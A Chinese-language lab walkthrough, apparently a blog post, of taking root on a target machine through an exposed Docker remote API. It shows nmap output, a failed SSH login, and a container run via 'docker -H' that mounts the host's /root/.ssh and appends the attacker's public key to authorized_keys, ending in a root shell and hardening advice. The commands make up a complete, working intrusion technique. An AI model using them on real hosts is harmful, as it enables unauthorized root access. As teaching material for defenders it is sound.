当前IP:
[root@node01 ~]# ifconfig eth0|sed -n -e '/inet /p'|awk '{print $2}'
192.168.22.68
[root@node01 ~]#
靶机IP:
192.168.86.190
我们先用 nmap 扫一下 靶机开了哪些端口:
[root@node01 ~]# nmap -sS -p 1-65535 192.168.86.190
Starting Nmap 6.40 ( http://nmap.org ) at 2019-12-25 16:40 CST
Nmap scan report for 192.168.86.190
Host is up (0.00034s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
873/tcp open rsync
2375/tcp open unknown //docker 远程端口
3306/tcp filtered mysql
4001/tcp open newoak
7001/tcp open afs3-callback
8080/tcp open http-proxy
60020/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
[root@node01 ~]#
我们来 ssh 下 此时是肯定进不去的 ,因为不知道对方服务器密码
[root@node01 ~]# ssh 192.168.86.190
The authenticity of host '192.168.86.190 (192.168.86.190)' can't be established.
ECDSA key fingerprint is SHA256:Kxx3gBWRj3GLge8LsSOKB3L1oWIdq4ULa/wp0GahYHo.
ECDSA key fingerprint is MD5:98:15:93:35:ef:1a:e6:96:1b:4a:aa:11:d9:19:d3:35.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.86.190' (ECDSA) to the list of known hosts.
root@192.168.86.190's password:
Permission denied, please try again.
root@192.168.86.190's password:
Permission denied, please try again.
root@192.168.86.190's password:
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).
[root@node01 ~]#
但靶机貌似开了docker 远程 我们可不可以通过这个来突破提权?
思路:
在本机生成密钥对,通过docker 目录映射的方式将 公钥 间接传到 靶机上 实现免密登录
# 查看下 docker 版本
[root@node01 ~]# docker -H 192.168.86.190 version
Client: Docker Engine - Community
Version: 19.03.5
API version: 1.40
Go version: go1.12.12
Git commit: 633a0ea
Built: Wed Nov 13 07:25:41 2019
OS/Arch: linux/amd64
Experimental: false
Server: Docker Engine - Community
Engine:
Version: 19.03.5
API version: 1.40 (minimum version 1.12)
Go version: go1.12.12
Git commit: 633a0ea
Built: Wed Nov 13 07:24:18 2019
OS/Arch: linux/amd64
Experimental: false
[root@node01 ~]#
# 生成密钥对
[root@node01 ~]# ssh-keygen -t rsa -P ''
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:PZVTEV1rZe2VDqXRkZ8nxtzMRF8wru2SIzyeSflBvXI root@node01
The key's randomart image is:
+---[RSA 2048]----+
| .OO%|
| =o*X|
| +++O=|
| . . =*oB|
| S o o.o..|
| . + o . |
| * * E |
| o * * |
| + . |
+----[SHA256]-----+
[root@node01 ~]# ll /root/.ssh/id_rsa
id_rsa id_rsa.pub
[root@node01 ~]#
[root@node01 ~]# cat /root/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxd11rFQA5lbv3naOKHXIz7/PwFf+w3zGfHgBO50f0Q71V9H2U8CVc+bL43L5jwe1m4ItqQ+kci+1qu0zov80En0GwXNR3AuohDl9QKijHXBYEUhofTeRxsB5s4WVE6zeR2onR3OJxhSP8T1sKAkkqa1bR6h55Ybp+UNNfedNaKSYR+JFi7GAS1/5QTBiYxv+NSUg5MuBFd6c4YZ/X8r0cTZUjqCWZpBrAtbn5XRNsz/31Y4GOXY6M+L/m/yiuE/8+CWrp7buFaQmW57Y2L9dq6ved98cYvrzKG90LbB/Uz7GSns+TtdKldkU1fLmHwcZ7X2u16wy846KZHD2JEM81 root@node01
[root@node01 ~]#
# 远程起个 容器 并将 靶机的 .ssh 映射到容器里,便于添加 公钥
[root@node01 ~]# docker -H 192.168.86.190 run -it -v /root/.ssh/:/mnt centos /bin/bash
[root@b74d29f82ead /]#
[root@b74d29f82ead /]# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxd11rFQA5lbv3naOKHXIz7/PwFf+w3zGfHgBO50f0Q71V9H2U8CVc+bL43L5jwe1m4ItqQ+kci+1qu0zov80En0GwXNR3AuohDl9QKijHXBYEUhofTeRxsB5s4WVE6zeR2onR3OJxhSP8T1sKAkkqa1bR6h55Ybp+UNNfedNaKSYR+JFi7GAS1/5QTBiYxv+NSUg5MuBFd6c4YZ/X8r0cTZUjqCWZpBrAtbn5XRNsz/31Y4GOXY6M+L/m/yiuE/8+CWrp7buFaQmW57Y2L9dq6ved98cYvrzKG90LbB/Uz7GSns+TtdKldkU1fLmHwcZ7X2u16wy846KZHD2JEM81 root@node01' >> /mnt/authorized_keys
[root@b74d29f82ead /]# exit
没错 已经可以拿到靶机的 root 了
[root@node01 ~]# ssh 192.168.86.190
Last failed login: Thu Dec 26 09:36:06 CST 2019 from 192.168.22.68 on ssh:notty
There were 6 failed login attempts since the last successful login.
Last login: Wed Dec 4 14:42:44 2019 from 192.168.1.15
[root@localhost ~]# ifconfig eth0|sed -n '/inet /p'|awk '{print $2}'
192.168.86.190
[root@localhost ~]#
总结
尽量不要开启 docker 远程操作,即时开启也不要全部放行,针对IP或内网网段放行,其次禁用 root 远程登录, 修改默认远程登录端口,创建用户时尽量避免使用弱用户名,比如 测试部 test ... ...